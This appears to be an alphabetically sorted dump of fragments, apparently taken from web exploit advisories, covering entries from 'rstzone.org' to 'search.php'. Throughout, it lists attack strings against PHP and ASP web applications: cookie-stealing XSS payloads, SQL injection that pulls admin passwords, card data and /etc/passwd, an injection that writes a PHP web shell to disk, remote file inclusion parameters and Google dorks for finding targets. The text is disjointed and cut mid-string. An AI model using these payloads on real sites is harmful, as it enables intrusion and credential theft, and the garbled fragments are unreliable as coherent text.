rstzone.org ] \n\n";
rstzone.org ) presents             
rtc
rte
rtf_parser.php?destination=[evil_scripts]
RTRandomimage
rt-sa-2006-001.php'],
rt-sa-2008-001.php
rt-sa-2008-002.php
rt-sa-2009-005
rt-sa-2012-002
rtwebalbum
rtwebalbum			      |   
rtwebalbum.x12.pl
ru
rubrique.class.php?path_om=[Shell]
ru.inc.php?LANG=[evilc0de]
*&rule=all&space_key=1
runcms
[runcms]
runcms_1.6
runcms.org
ruubikcms
[ruubikcms]
[ruubikcms1.1.0]
rvp-admin
rwx.biz.nf
rx9IX5ZS
s
/?s[]
%s
(\S*)
s004.radikal.ru
s006.radikal.ru
s017.radikal.ru
s018.radikal.ru
";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu
S28Z2FCZQD
s3cure.gr
s40.biz
s4n7h0>
s4vaworld.uni.cc
s5_clan_roster.html
s8forumfolder
saa.php?aid=2
sabadkharid.rar
sabdrimer.ru
sablonlar
/?s=about',log_id=1 on
sabrosus
SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
saddo.ru
/?s=admin&accion=lista"
/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user
saeid-61609-c99.php
sageth
sahana-0.6.4
sahana-0.6.5
sahana-agasti
saibal
saka
sales
salescripts
sales_orders_view.php?type=32
sales.view.php?customerid=1[SQL] 
salsa.php%00
salt
samart.6x.to
Sample%20album
sample.jpg&details=1&rotate[]=1
sample_posteddata.php
sample_posteddata.php" enctype="multipart
samples
sample.site
sandbox
santy_a.shtml
[SanyBee Gallery 0.1.1]
sap
s-a-p.ca
sapid
[sapidblog_path]
sapidcmf
sapid-cms
[sapidcms_path]
[sapidgalery_path]
[sapidshop_path]
sapid.sourceforge.net
sappy.dk
sarahma.co.id
saspcms
s.aspx?s=STR932252155
satallitex
saurus
saurus4
saurus471
SaurusCMS-4.7.0.tgz
saurus-cms-download-17626.html]
saurus_cms_upd4.7.0
SaurusCMSupdate4.7.0
sauvBase.php
savannah
savannah.gnu.org
Savant2
Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
Savant2_Plugin_textarea.php?mosConfig_absolute_path=
save
save2
save2db.asp"%20method="post">Username:<input%20na
save2db.asp"%20method="post">Username:<input%20name="us
saveCategories" method="post" name="main">
savedb.php"%20method="post">Username:<input%20name="username"%20type="text"%2
saveemail.html">
savefile.html" method=POST
save_importer
save.inc.php?install_root=[Shell]
save_item.php?name=[NAME]&ref=test&photo=..
save_item_settings HTTP
save" method="post" name="main">
saveNEWS_ID
savepage.php?savepage=FILENAME&pagecontent=CODE
save.php',
save.php%22%20method=%22post%22%3EUsername:%3Cinput%20aame=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=%22submit%22%20value=%22Login%22%3E%3C
save.php?file_save= (Shell Code)
save.php?type=user&amp;action=update&amp;id=1" method="post" name="FormName">
save.php?what=title&path=&p=testing.html"
savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')<
saveserver.php
saveset.php
save_settings
saveUser" method="post">
saveUser" method="post" name="main">
saveweb
/?sa=view;down=100
Sa-ViRuS.CoM                                             	 	     
sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null
sayfalar.php?KayitNo=[SQL]
sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3
sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3
[sazcart PATH]
/?s=b
sbclassified_admin
sbcms
sbjbs
sblog
/?s=blog&m=permalink&x="
/?s=blog&m=permalink&x=my-first-post
/?s=blog&m=permalink&x=my-first-post">
/?s=blog&m=permalink&x=my-first-post
/?s=blog&m=permalink&x=__stealer"'>
sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20
s_business_card_designer.htm
sbwmd_admin
sc
sc%3Cscript%3Eript%3E 
scaffold
scambi
scan.gif> 
scan_lang_insert.php?lang=..
scan.php?donsimg_base_path=[SHELL]
scarica.html
scarnews
scfQ9NS
schedule
scheduledReboot.php
schedule.php?action=del&id=[SQL-STATEMENT]
schlagwort.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version(),database(),current_user(),user(),6
school-data-nav
schoolhost
schoolmv2
schredder.php?tablename=zomplog_users&id=[user id here]" alt="Do you see this?" 
schreikasten
Schulleben
 || $sciezkacmd!~
scm
scmarch
scmarch-init.php?gfplugins=[Shell]
scmbzr
scmbzr-init.php?gfplugins=[Shell]
scmccase
scmccase-init.php?gfplugins=[Shell]
scmcpold
scmcpold-init.php?gfplugins=[Shell]
scmcvs
scmcvs-init.php?gfplugins=[Shell]
scmdarcs
scmdarcs-init.php?gfplugins=[Shell]
%s?cmd=w\n",argv[1],argv[2],argv[3]);
SCMFactory.class.php?gfcommon=[Shell]
scmgit
scmgit-init.php?gfplugins=[Shell]
scmhg
scmhg-init.php?gfplugins=[Shell]
SCMPlugin.class.php?gfcommon=[Shell]
s-cms
SCMS_1.0
scmsvn
scmsvn-init.php?gfplugins=[Shell]
scode.php?mybloggie_root_path=[evil script]
/?sc=oferta
sconfig
scorm
scormcloud
scormExport.inc.php?cmd=ls-la&includePath=
scorm_utils.php?GLOBALS[where_lms]=[cmd_url]
scorpion.su)                           ##\n";
scorpion.su)                         ##\n";
scout.wisc.edu
scozbook
scp
scr
scr<
scrapbook
scrape-external.php?id=1&tracker='UNION+SELECT+@@version,'1
scrape.php?info_hash=1%27)
scratcher
scr_changelang.php HTTP
scr_changelang.php => POST lang=..
screenshotfrom201212141.png
scri
scribe
[scribe_path]
scrip
script
 [script] 
 script>
';<\script><
[script]
[script] 
script>
script><
script><>
script>< 
script><!--
script><!-- 
script><"
script>|| 
script> 
script>  
script>  <
script>                  |
script>                       #
script>                      #
script>                    #
script>             #
script>.
script>'
script>'>
script>'>"
script>' 
script>' );
script>"
script>" 
script>"; 
script>"""
script>"""">
script>""""> )
script>");
script>)
script>	
script>	#		
script>		#
script 
script > 
Script
[Script]
Script>
Script> 
ScRiPt>
ScRiPt> 
ScRiPt>&
 SCRIPT>"> 
SCRIPT>
SCRIPT><!--
SCRIPT><"<"<"<"
SCRIPT><
SCRIPT> 
SCRIPT>  
SCRIPT>">
SCRIPT>"> 
SCRIPT>"""
script>]=0
SCRIPT><"<"<"<&#039;<&#039;
script>1
script>1 
script%253e
script_3163
script_3515
script39.htm   #
s cript%3E
script%3E
script% 3E 
script%3E 
script%3E ]
ScRiPt%3E
SCRIPT%3E
SCRIPT%3\E
SCRIPT%3E%0D%0A"));
script%3E%20%22%3E
script%3E%22;}
SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C
script%3E%3C
script%3E%3C !--
script%3E%3C!--
script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10 
script%3E%3Cform%20
script%3E%3Cpre%3E
script%3E%3Cscript%3Ealert(0)%3C
script%3E%3Cscript%3Ealert(1337)%3C
script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C
SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C
script%3E%3Cx%20y=%27
script%3E%3C!--&year=%3E%3Cscript%3Ealert(document.cookie)%3C
script%3E&add1=%3C
script%3E&amp%3bpassword=&amp%3bsort=1&amp%3bcat=502
script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59 
script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217 
script%3E&cat=
script%3E&cat=500&ppuser=
script%3E&Categor
script%3E&controller=news&src=
script%3E&currentIsExpanded=0 
script%3E&currentNumber=8 
scrip t%3E&enddate=%3Cscript%3Ealert%282%29;%3C
script%3E&errorMsgNum=301 
script%3E&f=
script%3E&forum=25&refresh=Vai
script%3E&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=
script%3E&game=tfc (instead of 'tfc' you should use the game, HLstats is configurated for)
script%3E&height=%3Cscript%3Ealert(0)%3C
script%3E&i=1%2Ejpg&s=thumb
script%3E&id2=10&subcat=Asus&p=products1 
script%3E&lon=%3Cscript%3Ealert(0)%3C
script%3E?nice='+escape(document.cookie)
script%3E&node=Gospels
script%3E&node=Political_Science&review=true
script%3E&pilih=search
script%3EPops cookie
script%3E&preview=Preview
script%3E&price=20&id=13
script%3E&review=true
script%3E&rowstart=90 
script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD 
script%3E&section_value=%22%3E%3Cscript%3Ealert%280%29%3C
script%3E&sort=4&cat=500&ppuser=
script%3ESubmit=Submit 
script%3E&table=1&title=dolfbnwl
script%3E&take=10&skip=0&page=1&pageSize=10
script%3E&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day  =&to_date_month=&to_date_year=
script%3E&where=1
script%3E&width=%3Cscript%3Ealert(0)%3C
script_4_Script_Website_Murah_Instant_Sekolah.html)
script>6db4597a5ab
script-7-1-0.html				|
script>87668222c12&filled=1
script>9ade5081a20 
ScRiPt>&Action=Pouya_Server
SCRIPT><"<"<"<"&action=signup
script>&action=Update&action_idx=1
script>&action=view
ScRiPt>&admin=0
script>&aktie=Zoek&idx=23
script><"?aku=aWQ9NiZzdGF0ZT0z
script><"?aku=c3VibWl0PWFkZCZzdGF0ZT0y
script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=
><script>alert()<
>"><script>alert(
"><script>alert(
>'><ScRiPt>alert(0)<
>"><ScRiPt>alert(0)<
>"><ScRiPt>alert(00213771818860)<
<script>alert(1)<
><script>alert(1);<
/?<script>alert(1)<
"><script>alert(1)<
/?"><script>alert(123);<
"<script>alert(123)<
"><script>alert(123)<
<script>alert(213771818860)<
>'><ScRiPt>alert(213771818860)<
>"><ScRiPt>alert(+213771818860)<
>"><ScRiPt>alert(213771818860)<
/?>"'><ScRiPt>alert(213771818860)<
"'><ScRiPt>alert(213771818860)<
/?=>"'><ScRiPt>alert(438948070551)<
>'><ScRiPt>alert(469588561854)<
>'><ScRiPt>alert(657988605523)<
>'><ScRiPt>alert(665068655391)<
<script>alert(666)<
>"><ScRiPt>alert('ahmadbady')<
<script>alert(document.cookie)<
><script>alert(document.cookie)<
/?<script>alert(document.cookie);<
/?"><script>alert(document.cookie);<
"><script>alert(document.cookie)<
"><script>alert(document.cookie);<
-script-alert-document-cookie-script-.htm
>"><script>alert('Hadi Kiamarsi')<
><script>alert('muuratsalo')<
"><script>alert('qabandi')<
".,script>alert(String.fromCharCode(88,83,83,32,53580,49828,53944))<
>"><ScRiPt>alert("sweet")<
>"><ScRiPt>alert("Sweet")<
/?=>"'><ScRiPt>alert("Sweet")<
script> and save your search. 
script>Announcements
script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&
script>&atksearchmode[customer]=substring
script>&b[password]=1
script><br
script_calendarstore-alisveris-scripti_1256_21.html] 
ScRiPt>&CaricatierID=1
ScRiPt>&cat=1
script>&categoryid=1&action=Search HTTP
script>category&searchterm=Announcements
script>&CatID=0
script>&child=0&r_type=1&chkin=2009-09-15&chkout=2009-09-16&datedif=1&str_day=Tue&end_day=Wed&start_day=Tue&star=
script>&cid=0&title=1&desc=1 
script>&c_image_name=
script>&clang=en
script_clean_cms.php
script?cookie="+escape(document.cookie)<
ScRiPt>&currentdir=images%2F
script>&cwd=%2E%2Fimage
script>&d=5
script>&d=[any day]
ScRiPt>&dbpass=Hacked-by-indoushka&send=Install
script_demo
script-demo.eu
Script_Dir
script-directory-software.php
script><div
script><div style="1
script>&domain=
script>&domain=xxx
script>&domain=xxx&target=xxx
script-downlaods?task=summary&cid=123&catid=214
script-download
scriptDownload
script_download.php?id=18744&id_1=881
script>e10802ab7a0&parent=1
scriptek
script>&EmailAddress=1&AccountUsername=1&Message=1 
script.emanual.ru
script>&env=data
scripte.phpway.de
script>&faq_categ[999][flag]=1
script_faq_manager.php                   |
scriptFile share\admincp
scriptFile share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre
scriptFile share\download.php?downID=[Sql Inject]
script-folder-name
script>&FontName=1 
script>&forum=2 
script>&from=login  #
ScRiPt>&fu=Submit
SCRIPT>">gazimage=198
SCRIPT>.gif
script>&goPassive=on&user=1&password=1&language=bulgarian server=<script>alert(&#039;&#039;as-208395078&#039;);<
script>&grp=&sSearchText= HTTP
script&gt;
script&gt; 
script&gt;"
script&gt;" 
script&gt;&limitstart=1
script&gt;&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
script&gt;&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480 
script&gt;&send=first&send=regular&send=priority&send=express
script>&hash=101<script>alert(2)<
script>&help=true&page=What_is_wiki
script>&hl=it" 
"><script>[hostile_code]< 
scripth_path
script> HTTP
script>&ID=1115946293.3552&t=puntuar
script>&id=2&text=0
script>&iIdProject=-1&tg=usrTskMgr
>############## Script Information: #########################
scripting
SCRIPT>"> <input type=hidden name=email> <input type=submit value=Submit> <
ScRiPt> in the box)
scripti.org
script>ipt>>
<script language=php>[YOUR_PHP_CODE].php
script>>&L=english&LastCheck=1133281246&B=0 
scriptlet.html>
scriptlet.html" 
script_lex-guestbook_614_26.html] 
scriptlife.org 
script>&loginpass="><script>alert(2)<
script>&logpassword=1 
script>&m=
scriptmafia.org
script>&m=[any month]&d=[any day]
script>&Message=1 
script>&message=&subject="><script>alert(2)<
script>' method="post">
script>" method="post">
script>&mode=all
script>&month=03&day=05
script>> &month=11
script)\n";
[scriptname] 
script>&NewsMode=1&SearchNews=Search&CatID=0
script>&NewsMode=1&SearchNews=Search&CatID=0 
 script> . nomatt
 script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som
script>&olimit=0&cat=&key1=&psku= 
script>&op=search
script>&option=bounces&page=reconcileusers
script> (or any javascript after the 'r"'>) and press enter : the javascript is executed.
SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c57a8ca2d57d
script>&Order=ErAnfangsdatum
script><p+"
ScriptPage
script>&page=2
script><"&passwd=TheSur 
ScRiPt>&password=indoushka&SubmitButton=Login
scriptpath
[script path
[script path]
[script_path]
[scriptpath]
[scriptpath]<
{script_path}
script path
script_path
scriptpath<
ScriptPath
[Script Path]
[ScriptPath]
Script_Path
[SCRIPT_PATH]
SCRIPT_PATH
SCRİPT_PATH
[scriptpath]&nbsp;&nbsp;&nbsp; <
script>[Peace xD ]
script>&period="><script>alert(1)<
script_php
script.php
script.php 
[script].php%00
[script].php%00 
script.php%00 
script.php?batch_id=..
script.php?data=script.php?data=<? system($cmd) ?> 
script.php?foo=bar> [options]\n";
{script}.php HTTP
script.php?id=1
[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--
script.php?ScriptID=2844
script><plaintext>
script><plaintext> 
script>pollid=3
script>&port=21&goPassive=on&user=1&password=1&language=bulgarian 
script>&prefix=&preparation=&postfix=&tipp=&ingredient=
ScRiPt>&rate=dorate&rating=1&B1=hacked%20by%20indoushka
script>&razd_id=45"><script>alert()<
script>&regpass=1&reregpass=1&anag=1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1
script>&reqagree=checked&m=
script>&reset=reset 
script>&result_type=posts
ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka
script>&review=true
scripts
scripts 
Scripts
script>";}?>----------------------------Save protection.php in the admin map of oscommercethen paste following code in all pages in the 
[script's_bad_day]
scripts.bdr130.net
scripts.bezut.info
script><script>
script><script>alert(1)<
script><script>alert(1);<
script><script>alert(123);<
script><script>alert.document.cookie)<
script><script>alert(document.cookie)<
script><script>alert(document.cookie);<
script><script>alert("hello")<
script><script>prompt(14)<
script><script>prompt(15)<
Scripts_Directory
scripts-dl
script>&SearchNews=Search&CatID=0
scriptsextra.ishallnotcare.org
scriptsgratuits.info
script>&sgs=off
script>&short_story=A new article&full_story=&id=1255233147&source=&if_convert_new_lines=yes&if_use_html=yes
scripts.html#mytickets
scripts.indisguise.org
scripts.indisguise.org">Powered by Enthusiast
script>&s=info&ID=1114815037.2498
script>&s=info&ID=1115946293.3552&t=puntuar
script" size="44" class="unique" class="inputbox"><
SCRIPT><"<'<'<'<'&size=75&type=2&w=127">''>">">">
scripts.oldguy.us
script>&sort_key=posts&sort_order=desc
script>&sort_order=
script>&sort_order=desc&sort_order=desc
ScRiPt>&Souknaamane%5BPic%5D=0
scripts-php
scripts.php
scripts-PHP
scripts.php?cat=Gestion
scripts.php#dodosrangen
scripts.php?id=3
scripts.php' % ip
scripts.php?p=free-scripts&id=2
scripts.php?script=SilverNews&l=en
scripts.protoplex.ru
scripts_ralcr
scripts_show
script>&state=1&country=0&url=http%3A%2F%2F&email=1&pwd=1&pwd2=1&submit=Signup
ScRiPt>&style=normal
script>" style="text-decoration:none">
ScRiPt>&subcat=hacked-by-indoushkat&start%5BPic%5D=0
ScRiPt>&SubmitButton=Login
script>&submit=Go
SCRIPT>&submit=Register
scripts.webmastersite.net
script>&target=xxx
script>&tg=usrTskMgr 
 script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.
script> (this might only affect attacker)
script>&time[0][1]=%3E=&time[0][2]=04&time[0][3]=24&time[0][4]=2012&time[0][5]=3&time[0][6]=3&time[0][7]=3&time[0][8]=+&time[0][9]=+&time_range=today&hmenu=Forensics&smenu=Forensics
script> <title>
" script to properly sanitize user-supplied input in "descr" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
" script to properly sanitize user-supplied input in "text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
" script to properly verify the source of HTTP request.
SCRIPT>&t=puntuar
script>&t=settings
script>&txtlen=500&smiley=1 
script>&type=2
script>&type=Artists 
script>&type=delete
>   <script type="text
script>&uid=100000
script>&uid=widget_acl99&levels=2&id_delegation=0
script>&uname=bGFsYWxh
script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=
script.vanta.ru
SCRIPT><"&verify=verify
ScRiPt>&webm_password=hacked-by-indoushka
script>;&x=34&y=6
script>&y=2007
script>&year=2006 
ScRiPt> (You Can use cookie Graber)
$scr_nm HTTP
scrollingads.php
scrollingtextads
scroll_page.php?speed=--%3E%3C
scr!pt]?query= 
scr!pt]&ratetype=percent
scrubs.net.ru
scry
sc_webcat
sc-wiki
sd
%s:%d
sdb
sdc.tgz
sdgsd
SDL2.php?action=module&amp;module=ModuleUpload&amp;moduleParams[action]=upload&amp;moduleParams[cwdRelPath]=");	
sdms.cafuego.net
sdv_infos.php?sitename=<script>alert()<
seagnulPath
seagull-0.6.3
seagullproject.org
search
/?search
search?
search">
Search
/?search=%25%27pwnz00red
search2.php?action=searchResults in the textbox enter <script>alert('moo')<
Search?action=search&q=TRY%20ANOTHER%20SEARCH%20NOW!%20YES,%20YOU!'%20onMouseOver='alert(document.title);'%20 
search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)--
search.asp?keywords="><script>alert(1)<
search-autocomplete
searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
search.class.php?system_path=[evil_scripts]
search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8
searchData.php?doSearch=find&summary='&expected_results='<script>alert(document.cookie)<
searchData.php?doSearch=find&summary='&name=<script>alert(document.cookie)<
searchData.php?doSearch=find&summary='<script>alert(document.cookie)<
searchData.php?doSearch=find&summary='&steps=<script>alert(document.cookie)<
searchdata.php?search_action=searchadv&cat=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
search.datatype.php?system_path=[evil_scripts]
search_dimensions.php
Search.do?method=mobileSearch
searchend.php" method="POST">
search&filter_name[]
search&filter_name=waraxe&limit[]
search&filter_tag[]
search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--
search_function.php?relative_script_path=[Evil Code]
searchgarage
search_handler.php?gfplugins=[Shell]
search?hl=en&q=php+cli+windows<
search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=
search?hl=tr&q=%22MangoBery+1.0+Alpha%22&meta=
search?hl=tr&q=%22TROforum+0.1%22&meta=                       #
search?hl=tr&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS%3A+php+WCMS+&meta=
search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=
search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D
search?hl=tr&q=inurl%3Ainc_securedocumentlibrary.asp&btnG=Ara&meta=
search?hl=tr&q=inurl%3Ainc_webblogmanager.asp&meta=
search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=
search.html
search.html->&#8221;Search string&#8221; = <script> alert(document.cookie) <
search.html?cat=0&keys=<script>alert("hello")<
search.html HTTP
search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
search.inc.php?install_root=[Shell]
search {Inject malicious code}
search_inv.php?action=search_all&order_by=%3Cmeta+http-equiv='Set-cookie'+content='=value'%3E&order=DESC+limit+1,1--
searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
search_list.php?chose=item&searchstring=%3Cscript%3Ealert('Lamed%20!');%3C
search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment 
searchlog
searchlog-download
SearchManager.class.php?gfwww=[Shell]
searchmatch.php?page=2&sort_by=username&sort_order=asc&txtgender=M&txtlookgender=F%27)%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23&txtlookagestart=18&txtlookageend=50&with_photo=
searchmatch.php?page=2&sort_by=username&sort_order=asc&txtgender=M&txtlookgender=F') union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23&txtlookagestart=18&txtlookageend=50&with_photo=
search?num=100&hl=en&lr=&as_qdr=all' . '&
/?search=" onclick=alert(1) a=
search.php
search.php                                               #
search.php                                    #
search.php?
search.php',
search.php';
search.php">
search.php?12,search=vamp,page=1,match_type=ALL,
search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script
search.php?action=doSearch&searchFor=[code]&search_type=all 
search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP
search.php?action=results&sid='[sql_query]
search.php?action=results&sid=[valid sid here]
search.php?action=search&keywords=&author=d3vilbox&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=Submit&old_searches[]=[sql-injection] 
search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
search.php?action=search&q=[SQL] 
search.php?action=soundex&firstname="><script>alert(document.cookie)<
search.php?action='[SQL Injection]
search.php?adv=1&status=
search.php?all_fields=0&do_search=1&advanced=1&group=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E
search.php?allwords=<br><script>alert(document.cookie);<
search.php?bathrooms1=0.5%20or%20%28sleep%282%29%2b1%29%20limit%201%20--
search.php?bathrooms1=-1%20or%2077%20%3d%2075&bedrooms1=1&cat_id1=1&city1=San%20Francisco&look=1&nolinks1=20&order=link_id&price1=1&price2=1&sort=DESC
search.php?bathrooms1= {Inject SQL}
search.php?c=
search.php?c=(135['foo])
search.php?c=135'+union+all+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
search.php?c=-999999'+union+select+1,2,
search.php?category=-1+union+all+select+version()--
search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
search.php?category=6
search.php?category=999999 UNION SELECT
search.php?CategoryID=15&SubcategoryID=60'
search.php?CategoryID=15&SubcategoryID=[SQL]
search.php?CategoryID=6[SQL]
search.php?category="><script>alert(
search.php?category=[SQli]
search.php?category=[SQLI]
search.php?cat_id1=1&city1=fu+&price2=%3E%22%3Ciframe+src
search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch=&ddlCategory=1 AND 1=1
search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch=&ddlCategory=1 AND 1=2  
search.php?config[fsBase]=[evil_scripts]
search.php?c=[sqli]
search.php?dong=smf".$version."\n\n";
search.php?do=process&showposts=0&query=<!-- 
search.php?do_search=1&advanced=1&name=&email=&status=&sex=&year=&house=&room=&mailbox=&phone=%3Cscript%3Edocument.write%28document.cookie
search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010
search.php" enctype="multipart
search.php?event_id=[SQL]
search.php?field=[SQL]
search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=any&lorder=[SQL]
search.php?field=Subject&searchvalue=&Category=any&Status=any&Priority=[SQL]
search.php?field=Subject&searchvalue=&Category=any&Status=[SQL]
search.php?field=Subject&searchvalue=&Category=[SQL]
search.php?field=Subject&searchvalue=[SQL]
search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP
search.php?front_searchresult=<
search.php?front_searchsubmit="><script>alert(document.cookie)<
search.php?gfplugins=[Shell]
search.php?go=yes&q=a&area1=123%27SQL_CODE
search.php?hash=19e9abf204087d0765f81c5bfb1a6fef&keyword=>"><script>alert(123);<
search.php','hash=','<TD align="middle" nowrap="nowrap" width=90>([^<]+)<
search.php?header_prog=[Evil_Script]
search.php?key=<script>alert(12345);<
search.php?keyword=%22%3E%3Cscript%3Ealert%28%
search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23
search.php?keywords1=&keywords2=&look=%27%20onmouseover%3dprompt%28945724%29%20bad%3d%27&nolinks1=10&order=city&page=2&sort=ASC
search.php?Keywords=1>"><ScRiPt %0D%0A>alert(412646446896)%3B<
search.php?keywords=1&selectcategory=1 and 1=1+union+select+version()--&submit=search
search.php?keywords=1&selectcategory=1+union+select+version()--&submit=search
search.php?keywords=1&selectcategory=[BLIND]
search.php?keywords=1&selectcategory="><script>alert(document.cookie);<
search.php?keywords=1&selectcategory=[SQL]&submit=search
search.php?lan=[darkcode]						[»]
search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)<
search.php?lookup=1>'><ScRiPt%20%0a%0d>alert("Sweet")%3B<
search.php?lookup=<script+type="text
search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1 &r=0&min_age=16&max_age=100&location=&gender1=&gender2=
search.php" method="post">
search.php?metode=1'
search.php?metode=[SQLi]
search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C
search.php?mode='><script>alert(document.cookie)<
search.php?mode=searchuser">
search.php?mode='[SQL-inj]
search.php?moduleFolder=[Evil> Script]
search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=
search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=
search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=
search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));<
search.php?p=home&query=1[SQLi]&search=Search
search.php post this code <script>alert('night_warrior');<
search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins
search.php?q='
search.php?q=123&domain=incidents&start=SQL_CODE_HERE[code]
search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E
search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4 
search.php?rate=[sql]
